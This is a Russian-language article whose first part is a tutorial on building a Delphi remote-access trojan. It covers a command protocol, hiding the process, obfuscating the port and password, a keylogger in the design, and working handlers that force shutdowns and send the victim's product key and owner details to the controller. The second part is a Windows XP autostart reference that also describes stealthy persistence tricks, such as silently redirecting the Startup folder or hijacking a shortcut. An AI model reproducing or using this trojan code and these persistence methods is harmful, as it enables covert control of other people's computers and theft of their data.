теория написания троянов

Часть 1
В этой статье описана теория написания троянов(client/server) на Delphi, работающих по протоколу TCP/IP.

  Для начала, я считаю, надо разработать протокол обмена. Вы должны выбрать между побайтовой или построковой работой. Я приведу пример построкового протокола обмена:

Где:
1. com. - команда
2. sig. - сигнатура
3. par. - параметр
4. [ ] - разделитель (разделителем может быть любой символ, который точно не встретится в самой команде или в параметре)

А вот пример реализации такого протокола обмена:

function _parser(str:string):tstringlist;
var
s : tstringlist;
i : integer;
st : integer;
sp : boolean;
begin
st := 0;
sp := true;
s := tstringlist.create;
s.add('');
for i := 1 to length(str) do
begin
if str[i] = '†' then
begin
if not sp then
begin
inc(st);
s.add('');
end;
sp := true;
end
else
begin
sp := false;
s.strings[st] := s.strings[st] + str[i];
end;
end;
if sp then s.delete(s.count-1);
result:=s;
end;

Эта функция делит переданную ей строчку на слова(разделителем здесь является символ †). Например, если функции передать: abc†1000†abc†abc, то в ответе мы получим tstringlist такого вида:

abc
1000
abc
abc

Таким образом при получении какой-либо строки мы передаем ее параметром в функцию _parser, а ответом функции будет трафик разобранный на части согласно данному протоколу обмена. Что означает первая часть протокола обмена(команда), думаю, не надо объяснять. Я считаю, что лучше не писать троянов, работающих по нескольким портам(одновременно). Из-за этого в данном протоколе обмена есть такая вещь, как сигнатура. Люди пишут трояны работающие на нескольких портах, чтобы распределить команды по какому-либо признаку. Например, первый порт - команды работы с файлами, второй порт - остальные команды. При помощи сигнатуры тоже можно разделить все команды на несколько типов. Например, сигнатуре 1 соответствует перечень команд работы с файлами, а сигнатуре 2 соответствует перечень других команд. Количество параметров для каждой команды может быть разным, можно даже сделать команды с переменным количеством параметров. Разделитель - это некий барьер отделяющий составляющие части протокола обмена.

После реализации протокола обмена можно сразу сделать троян невидимым для "постороннего взгляда". Есть много способов исполнения этой задачи. Приведу один из них, на мой взгляд, самый простой:

type
tregisterserviceprocess = function (dwprocessid,dwtype:dword) : dword;
stdcall;

А при создании формы пишем:

var
hndl : thandle;
registerserviceprocess : tregisterserviceprocess;
begin
hndl:=loadlibrary('KERNEL32.DLL');
registerserviceprocess:=getprocaddress(hndl,'RegisterServiceProcess');
registerserviceprocess(getcurrentprocessid,1);
freelibrary(hndl);

Да, и не забудьте в самом проекте указать:
application.showmainform:=false;

А вот механизм инсталляции в систему, если его написать слишком рано, может затруднить отладку трояна. Все значения, такие как: порт, пароль и т.п. должны быть в зашифрованном виде. Для этой цели советую не использовать очень сложные алгоритмы шифрования. Если кому-то понадобится эта информация, то он все равно ее получит. Можно использовать, например, такой алгоритм шифрования:

function crypt(str:string):string;
var
len : integer;
a : integer;
b : integer;
c : integer;
d : integer;
r : string;
begin
d := 13;
r := '';
len := length(str);
for a := 1 to len do
begin
b := ord(str[a]);
b := b - 32;
c := b xor d;
c := c + 32;
r := r + chr(c);
d := d + 1;
end;
result := r;
end;

Я могу расшифровать информацию, зашифрованную этим алгоритмом, в уме, но все равно для своей задачи он пригоден. Также можно использовать его и для шифрования трафика, но тогда придется чуть изменить схему трояна: сначала трафик передается функции crypt, а потом функции _parser.

После реализации протокола обмена и шифрования значений можно переходить к самому трояну. Я обычно пишу примерно по такой схеме:

Как видите, при запуске, троян становится невидимым, потом он инсталлируется в систему и переходит в состояние ожидания, но отдельно висит offline keylogger, который периодчески сохраняет свой буфер в укромное место. Кроме keylogger ещё ping модуль висит, всегда готовый ответить на запрос. При получении некоего трафика он проходит через _parser модуль, который ещё определяет есть ли это то, что надо, или это просто неправильный запрос не от клиента. Если пароль введен правильно, то последующий трафик сразу идет на командный модуль. Некоторые модули на схеме связаны не только с основным, но и командным модулем потому, что, например, модуль remote ping включается только через команду, а keylogger высылает записанные им клавиши тоже только при поступлении соответствующей команды.

На самом деле это упрощенная схема, сюда можно ещё много чего добавить, но это уже ваше дело. А теперь я хотел бы немного отойти от теории, и чуть-чуть приблизиться к практике. Вот примеры некоторых команд:

Это пример команды messagebox. Я не буду объяснять значение
всех переменных т.к. это всего лишь пример и здесь итак все понятно.

_com - команда

_data - ответ функции _parser

const
_line = #13+#10;
_icon : array [0..4] of integer=(0,mb_iconexclamation,
mb_iconinformation,mb_iconstop,mb_iconquestion);

############################################################
if _com = 2 then
begin
if _data.count = 6 then
if (strtoint(_data[5]) = 0) or
(strtoint(_data[5]) = 1) or
(strtoint(_data[5]) = 2) or
(strtoint(_data[5]) = 3) or
(strtoint(_data[5]) = 4) then
begin
if _data[2] = '1' then
begin
if messagebox(0,pchar(_data[3]),pchar(_data[4]),
mb_ok + _icon[strtoint(_data[5])]) <> 0 then
begin
socket.sendtext(_name+' : true {2,1,'+_data[5]+'}'+_line);
socket.sendtext(_name+' : ok {2,1,'+_data[5]+'}'+_line);
end;
end;
if _data[2] = '2' then
begin
if messagebox(0,pchar(_data[3]),pchar(_data[4]),
mb_okcancel + _icon[strtoint(_data[5])]) = idok then
begin
socket.sendtext(_name+' : true {2,2,'+_data[5]+'}'+_line);
socket.sendtext(_name+' : ok {2,2,'+_data[5]+'}'+_line);
end else
begin
socket.sendtext(_name+' : true {2,2,'+_data[5]+'}'+_line);
socket.sendtext(_name+' : cancel {2,2,'+_data[5]+'}'+_line);
end;
end;
if _data[2] = '3' then
begin
if messagebox(0,pchar(_data[3]),pchar(_data[4]),
mb_yesno + _icon[strtoint(_data[5])]) = idyes then
begin
socket.sendtext(_name+' : true {2,3,'+_data[5]+'}'+_line);
socket.sendtext(_name+' : yes {2,3,'+_data[5]+'}'+_line);
end else
begin
socket.sendtext(_name+' : true {2,3,'+_data[5]+'}'+_line);
socket.sendtext(_name+' : no {2,3,'+_data[5]+'}'+_line);
end;
end;
if _data[2] = '4' then
begin
k := messagebox(0,pchar(_data[3]),pchar(_data[4]),
mb_abortretryignore + _icon[strtoint(_data[5])]);
if k = idabort then
begin
socket.sendtext(_name+' : true {2,4,'+_data[5]+'}'+_line);
socket.sendtext(_name+' : abort {2,4,'+_data[5]+'}'+_line);
end else
if k = idretry then
begin
socket.sendtext(_name+' : true {2,4,'+_data[5]+'}'+_line);
socket.sendtext(_name+' : retry {2,4,'+_data[5]+'}'+_line);
end else
if k = idignore then
begin
socket.sendtext(_name+' : true {2,4,'+_data[5]+'}'+_line);
socket.sendtext(_name+' : ignore {2,4,'+_data[5]+'}'+_line);
end;
end;
if _data[2] = '5' then
begin
k := messagebox(0,pchar(_data[3]),pchar(_data[4]),
mb_yesnocancel + _icon[strtoint(_data[5])]);
if k = idyes then
begin
socket.sendtext(_name+' : true {2,5,'+_data[5]+'}'+_line);
socket.sendtext(_name+' : yes {2,5,'+_data[5]+'}'+_line);
end else
if k = idno then
begin
socket.sendtext(_name+' : true {2,5,'+_data[5]+'}'+_line);
socket.sendtext(_name+' : no {2,5,'+_data[5]+'}'+_line);
end else
if k = idcancel then
begin
socket.sendtext(_name+' : true {2,5,'+_data[5]+'}'+_line);
socket.sendtext(_name+' : cancel {2,5,'+_data[5]+'}'+_line);
end;
end;
if _data[2] = '6' then
begin
if messagebox(0,pchar(_data[3]),pchar(_data[4]),
mb_retrycancel + _icon[strtoint(_data[5])]) = idretry then
begin
socket.sendtext(_name+' : true {2,6,'+_data[5]+'}'+_line);
socket.sendtext(_name+' : retry {2,6,'+_data[5]+'}'+_line);
end else
begin
socket.sendtext(_name+' : true {2,6,'+_data[5]+'}'+_line);
socket.sendtext(_name+' : cancel {2,6,'+_data[5]+'}'+_line);
end;
end;
exit;
end;
end;

Пример команды exitwindows:
if _com = 6 then
begin
if _data.count = 3 then
begin
if _data[2] = '1' then
begin
socket.sendtext(_name+' : true {6,1}'+_line);
exitwindows(ewx_force,1);
end else
if _data[2] = '2' then
begin
socket.sendtext(_name+' : true {6,2}'+_line);
exitwindows(ewx_logoff,1);
end else
if _data[2] = '3' then
begin
socket.sendtext(_name+' : true {6,3}'+_line);
exitwindows(ewx_poweroff,1);
end else
if _data[2] = '4' then
begin
socket.sendtext(_name+' : true {6,4}'+_line);
exitwindows(ewx_reboot,1);
end;
if _data[2] = '5' then
begin
socket.sendtext(_name+' : true {6,5}'+_line);
exitwindows(ewx_shutdown,1);
end;
exit;
end;
end;

Сбор некоторых сведений о системе:
if _com = 7 then
begin
if _data.count = 2 then
begin
_inf := tregistry.create;
_inf.rootkey:=hkey_local_machine;
if _inf.openkey('software\microsoft\windows\currentversion',true)
= true then
st := _inf.readstring('Version')
else
st := 'unknown';
socket.sendtext(_name+' : system : '+st+' {7}'+_line);
_inf.closekey;
if
_inf.openkey('hardware\description\system\centralprocessor\0',true)
= true then
st := _inf.readstring('vendoridentifier')
else
st := 'unknown';
socket.sendtext(_name+' : processor : '+st+' {7}'+_line);
_inf.closekey;
if _inf.openkey('config\0001\display\settings',true) = true then
st := _inf.readstring('resolution')
else
st := 'unknown';
socket.sendtext(_name+' : resolution : '+st+' {7}'+_line);
_inf.closekey;
if _inf.openkey('config\0001\display\settings',true) = true then
st := _inf.readstring('bitsperpixel')
else
st := 'unknown';
socket.sendtext(_name+' : bits per pixel : '+st+' {7}'+_line);
_inf.closekey;
if _inf.openkey('software\microsoft\windows\currentversion',true)
= true then
st := _inf.readstring('systemroot')
else
st := 'unknown';
socket.sendtext(_name+' : system root : '+st+' {7}'+_line);
_inf.closekey;
if _inf.openkey('software\microsoft\windows\currentversion',true)
= true then
st := _inf.readstring('productkey')
else
st := 'unknown';
socket.sendtext(_name+' : product key : '+st+' {7}'+_line);
_inf.closekey;
if _inf.openkey('software\microsoft\windows\currentversion',true)
= true then
st := _inf.readstring('productname')
else
st := 'unknown';
socket.sendtext(_name+' : product name : '+st+' {7}'+_line);
_inf.closekey;
if _inf.openkey('software\microsoft\windows\currentversion',true)
= true then
st := _inf.readstring('programfilespath')
else
st := 'unknown';
if st = '' then
begin
_inf.closekey;
if _inf.openkey('software\microsoft\windows\currentversion',true)
= true then
st := _inf.readstring('programfilesdir')
else
st := 'unknown';
end;
socket.sendtext(_name+' : programfiles path : '+st+' {7}'+_line);
_inf.closekey;
if _inf.openkey('software\microsoft\windows\currentversion',true)
= true then
st := _inf.readstring('registeredorganization')
else
st := 'unknown';
socket.sendtext(_name+' : registered organization : '+st+'
{7}'+_line);
_inf.closekey;
if _inf.openkey('software\microsoft\windows\currentversion',true)
= true then
st := _inf.readstring('registeredowner')
else
st := 'unknown';
socket.sendtext(_name+' : registered owner : '+st+' {7}'+_line);
_inf.closekey;
if _inf.openkey('software\microsoft\windows\currentversion',true)
= true then
st := _inf.readstring('sm_accessoriesname')
else
st := 'unknown';
socket.sendtext(_name+' : accessories name : '+st+' {7}'+_line);
_inf.closekey;
if _inf.openkey('software\microsoft\windows\currentversion',true)
= true then
st := _inf.readstring('versionnumber')
else
st := 'unknown';
socket.sendtext(_name+' : version number : '+st+' {7}'+_line);
_inf.closekey;
if _inf.openkey('software\microsoft\windows\currentversion',true)
= true then
st := _inf.readstring('wallpaperdir')
else
st := 'unknown';
socket.sendtext(_name+' : wall paper dir : '+st+' {7}'+_line);
_inf.closekey;
if _inf.openkey('software\microsoft\windows\currentversion',true)
= true then
st := _inf.readstring('productid')
else
st := 'unknown';
socket.sendtext(_name+' : product id : '+st+' {7}'+_line);
_inf.closekey;
if _inf.openkey('software\microsoft\windows\currentversion',true)
= true then
st := _inf.readstring('otherdevicepath')
else
st := 'unknown';
socket.sendtext(_name+' : other device path : '+st+' {7}'+_line);
_inf.closekey;
if _inf.openkey('software\microsoft\windows\currentversion',true)
= true then
st := _inf.readstring('mediapath')
else
st := 'unknown';
socket.sendtext(_name+' : media path : '+st+' {7}'+_line);
_inf.closekey;
_inf.destroy;
exit;
end;
end;

Проставление приоритета своему процессу:
if _com = 14
then
begin
if _data.count = 2 then
begin
if pr = false then
begin
processid := getcurrentprocessid;
processhandle :=
openprocess(process_set_information,false,processid);
setpriorityclass(processhandle,realtime_priority_class);
threadhandle := getcurrentthread;
setthreadpriority(threadhandle,thread_priority_time_critical);
socket.sendtext(_name+' : true (on) {14}'+_line);
pr := true;
end
else
begin
processid := getcurrentprocessid;
processhandle :=
openprocess(process_set_information,false,processid);
setpriorityclass(processhandle,normal_priority_class);
threadhandle := getcurrentthread;
setthreadpriority(threadhandle,thread_priority_normal);
socket.sendtext(_name+' : true (off) {14}'+_line);
pr := false;
end;
exit;
end;
end;

Ну вот вроде и все. Спасибо за внимание.

Автозагрузка в Windows XP
Какие способы автозагрузки существуют? Где найти список программ, загружаемых Windows автоматически? Как отключить списки автозагрузки? Этим темам и посвящена данная статья.
Существует немало способов автозагрузки программ. Ниже приведены несколько вариантов для ознакомления, возможно это поможет вам, если возникнет необходимость найти и удалить какую-либо программу из автозагрузки.

Способы автозагрузки и отключение списков автозагрузки:
Реестр - в реестре автозагрузка представлена в нескольких местах:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] - программы, которые запускаются при входе в систему. Данный раздел отвечает за запуск программ для всех пользователей системы.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce] - программы, которые запускаются только один раз при входе пользователя в систему. После этого ключи программ автоматически удаляются из данного раздела реестра. Данный раздел отвечает за запуск программ для всех пользователей системы.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx] - программы, которые запускаются только один раз, когда загружается система. Этот раздел используется при инсталляции программ, например для запуска настроечных модулей. После этого ключи программ автоматически удаляются из данного раздела реестра. Данный раздел отвечает за запуск программ для всех пользователей системы.
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] - программы, которые запускаются при входе текущего пользователя в систему
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce] - программы, которые запускаются только один раз при входе текущего пользователя в систему. После этого ключи программ автоматически удаляются из данного раздела реестра.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices] - программы, которые загружаются при старте системы до входа пользователя в Windows.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce] - программы отсюда загружаются только один раз, когда загружается система.
Например, чтобы автоматически запускать Блокнот при входе текущего пользователя, открываем Редактор реестра (regedit.exe), переходим в раздел [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] и добавляем следующий ключ:
"NOTEPAD.EXE"="C:\WINDOWS\\System32\notepad.exe"

Использование групповой политики для автозапуска: - Откройте оснастку "Групповая политика" (gpedit.msc), перейдите на вкладку "Конфигурация компьютера - Административные шаблоны - Система". В правой части оснастки перейдите на пункт "Запускать указанные программы при входе в систему". По умолчанию эта политика не задана, но вы можете добавить туда программу: включаем политику, нажимаем кнопку "Показать - Добавить", указываем путь к программе, при этом если запускаемая программа находится в папке ..WINDOWS\System32\ то можно указать только название программы, иначе придется указать полный путь к программе. При этом в системном реестре в разделе [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies] создается подраздел \Explorer\Run с ключами добавленных программ. Пример:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
"1"="notepad.exe"
"2"="iexplore.exe"
В итоге получаем запуск Блокнота и Internet Explorer для всех пользователей. Аналогично задается автозапуск для текущих пользователей, в оснастке "Групповая политика" это путь "Конфигурация пользователя - Административные шаблоны - Система", а в реестре раздел
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
При этом программы из этого списка не отображаются в списке программ доступных для отключения в msconfig.exe, а также определяются не всеми менеджерами автозагрузки.

Автозапуск из особого списка - Программы могут запускаться и из следующего раздела реестра:
[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows]
Параметры:
"load"="programma" - программы запускаемые до входа пользователя в систему:
"run"="programma" - программы запускаемые после входа пользователя в систему.
Эти параметры - аналог автозагрузки из Win.ini в Windows 9х. Пример: запускаем Internet Explorer до входа пользователя в систему и Блокнот после входа пользователя в систему:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"load"="iexplore.exe"
"run"="notepad.exe"

Не обрабатывать список автозапуска для старых версий - Настраивается с помощью групповой политики: "Конфигурация компьютера - Административные шаблоны - Система - Не обрабатывать список автозапуска для старых версий", если эту политику включить, то не будут запускаться программы из следующих разделов реестра:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
При использовании этой политики в реестре создается следующий ключ:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"DisableLocalMachineRun"=dword:00000001
Аналогично устанавливается политика для текущих пользователей: "Конфигурация пользователя - Административные шаблоны - Система - Не обрабатывать список автозапуска для старых версий" с тем отличием что в реестре эта опция включается в ином месте:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"DisableLocalUserRun"=dword:00000001

Игнорировать списки автозагрузки программ выполняемых однажды - Настраивается с помощью групповой политики: "Конфигурация компьютера - Административные шаблоны - Система - Не обрабатывать список автозапуска программ, выполняемых однажды", если эту политику включить, то не будут запускаться программы запускаемые из списка
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce]
Если эта политика включена, в реестре создается следующий ключ:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"DisableLocalMachineRunOnce"=dword:00000001
Так же настраивается политика для текущих пользователей: "Конфигурация пользователя - Административные шаблоны - Система - Не обрабатывать список автозапуска программ, выполняемых однажды" Параметры реестра:
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"DisableLocalUserRunOnce"=dword:00000001

Назначенные задания - программы могут запускаться с помощью "Мастера планирования заданий". Посмотреть список установленных заданий, а также добавить новое можно так: "Пуск - Все программы - Стандартные - Служебные - Назначенные задания" - при этом откроется папка ..\WINDOWS\Tasks, в которой отображены назначенные задания. Чтобы добавить новое задание, нужно дважды щелкнуть левой кнопкой мыши по значку "Добавить задание". Запуск программ с помощью этого мастера возможен однократно, при входе в Windows, при включении компьютера, а также по расписанию.

Папка "Автозагрузка" - это папка, в которой хранятся ярлыки для программ запускаемых после входа пользователя в систему. Ярлыки в эту папку могут добавляться программами при их установке или пользователем самостоятельно. Существует две папки - общая для всех пользователей и индивидуальная для текущего пользователя. По умолчанию эти папки находятся здесь:

..\Documents and Settings\All Users\Главное меню\Программы\Автозагрузка - это папка, программы из которой будут запускаться для всех пользователей компьютера.

..\Documents and Settings\Username\Главное меню\Программы\Автозагрузка - это папка, программы из которой будут запускаться для текущего пользователя (здесь он назван Username).
Посмотреть какие программы у вас запускаются таким способом можно открыв меню "Пуск - Все программы - Автозагрузка". Если вы создадите в этой папке ярлык для какой-нибудь программы, она будет запускаться автоматически после входа пользователя в систему. Если при входе пользователя в систему удерживать нажатой клавишу "Shift", то программы из папок "Автозагрузка" запускаться не будут.

Смена папки автозагрузки - Windows считывает данные о пути к папке "Автозагрузка" из реестра. Этот путь прописан в следующих разделах:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders]
"Common Startup"="%ALLUSERSPROFILE%\Главное меню\Программы\Автозагрузка" - для всех пользователей системы.[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders]
"Startup"="%USERPROFILE%\Главное меню\Программы\Автозагрузка" - для текущего пользователя.
Сменив путь к папке мы получим автозагрузку всех программ из указанной папки. Например:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders]
"Startup"="c:\mystartup" - система загрузит все программы, ярлыки которых находятся в папке c:\mystartup\, при этом папка "Автозагрузка" все так же будет отображаться в меню "Пуск", а если у пользователя в ней ничего не было, то он и не заметит подмены.

Подмена ярлыка для программы из списка автозагрузки - допустим у вас установлен русскоязычный пакет Microsoft Office. Тогда в папке "Автозагрузка" у вас будет находиться ярлык "Быстрый запуск Microsoft Office" - этот ярлык устанавливается туда по умолчанию. Но вовсе необязательно этот ярлык ссылается именно на "Быстрый запуск Microsoft Office" - вместо него может быть запущена любая другая программа, тем более что на функциональности Office это не скажется.

Добавление программы к программе запускаемой из списка автозагрузки - модификация предыдущего варианта - одновременно с загрузкой какой-либо программы из списка автозагрузки у вас будет стартовать другая программа - дело в том, что можно "склеить" два исполняемых файла в один и они будут запускаться одновременно. Существуют программы для такой "склейки". Или ярлык может ссылаться на командный файл, из которого и будут запускаться как оригинальная программа из списка, так и добавленные посторонние программы.
Посмотреть список автоматически загружаемых программ можно открыв программу "Сведения о системе" (откройте "Пуск - Все программы - Стандартные - Служебные - Сведения о системе" или наберите msinfo32.exe в командной строке) и перейдя в пункт "Программная среда - Автоматически загружаемые программы". Программа "Свойства системы" отображает группы автозагрузки из реестра и папок "Автозагрузка".
Другая программа, позволяющая посмотреть список программ автозагрузки - "Настройка системы" (для запуска наберите msconfig.exe из командной строки). Эта программа кроме просмотра списка автозагрузки предоставляет возможность отключения всех пунктов автозагрузки (вкладка "Общие") или выборочных программ (вкладка "Автозагрузка").
Существует множество менеджеров автозагрузки от сторонних разработчиков. Один из таких менеджеров - Startup Extractor. Он автоматически сканирует папки автозагрузки, системный реестр, и отображает все найденные программы и файлы в виде списка. Если какая-то программа будет добавлена в список автозагрузки, Startup Extractor сообщит вам об этом и предложит либо оставить эту программу в списке либо удалить ее. При удалении программы из списка Starup Extractor может восстановить ее. Также вы сможете добавлять программы, редактировать параметры программ, сохранять список автозагрузки и многое другое. Программа имеет русский интерфейс, бесплатна, не требует установки.
Примечание : Приведенная информация приведена в справочных целях. Вся информация, приведенная выше, относится в первую очередь к опытным пользователям, способным восстановить систему после ошибочных изменений в реестре. Если вы не уверены, что в случае ошибочных действий сможете восстановить систему, не используйте приведенную информацию в практических целях, ошибочные действия при внесении изменений в реестр могут серьезно повредить систему и даже привести к переустановке системы. Начинающие пользователи для добавления программ в список автозагрузки должны использовать только папку "Автозагрузка" или "Мастер назначенных заданий".